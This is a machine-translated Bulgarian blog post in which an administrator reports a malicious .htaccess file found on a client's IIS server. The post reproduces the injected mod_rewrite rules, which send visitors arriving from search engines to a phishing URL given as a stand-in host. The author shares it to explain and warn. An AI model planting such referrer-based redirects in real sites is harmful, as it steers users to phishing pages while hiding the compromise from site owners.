Четвъртък, 22 яну, 2009 | Автор:

Аз съвсем наскоро откри проблем с уеб сайт на клиент дължи на .Htaccess досие. Сайтът се хоства на Windows Този сървър работи IIS използвайки IISPassword, което прави използването на .Htaccess файлове за своите настройки.

IISPassword не следват точно същите правила като с Apache обаче. Ако .htaccess файл съществува след това го трябва да съдържа IISPassword-подходящи правила, в противен случай се връща само сървъра следната грешка:

Error 500 given by IIS Password
Ето съдържанието на файла .htaccess. Аз бях само модифицирана адреса окончателното пренасочване да сочи към example.com подходящо:

RewriteEngine На
RewriteCond %{HTTP_REFERER} .*Google. * $ [NC,ИЛИ]
RewriteCond %{HTTP_REFERER} .*AOL. * $ [NC,ИЛИ]
RewriteCond %{HTTP_REFERER} .*MSN. * $ [NC,ИЛИ]
RewriteCond %{HTTP_REFERER} .*Yahoo. * $ [NC,ИЛИ]
RewriteCond %{HTTP_REFERER} .*Yandex. * $ [NC,ИЛИ]
RewriteCond %{HTTP_REFERER} .*Rambler. * $ [NC,ИЛИ]
RewriteCond %{HTTP_REFERER} .*а. * $ [NC]
RewriteRule .* HTTP://siffy-phishing-url.example.com [R,L]

Ако това бяха на предприятието на сървъра Apache с течаща mod_rewrite, повечето потребители на мрежата ще отиват директно към правилния съдържанието сайт. Само ако те стигнаха до сайта чрез търсачките и индекси, изброени в .htaccess, би те да бъдат пренасочени към siffy фишинг URL адреса че крекинг иска жертви, за да достигне.

Разбира се, крекинг (или може би дори автоматизирана червей) не осъзнават, че сървърът въпросната дори не подкрепят тези правила mod_rewrite. Но така или иначе, това е много тревожно, колкото мога да предвиди много аргументи за това дали или не на сайта е работещ

Дял
Категория: хостинг, случаен
Можете да проследите коментарите към този пост чрез RSS 2.0 фураж. Можете да оставите отговор, или TrackBack от вашия собствен сайт.
Вашият коментар » Влезте в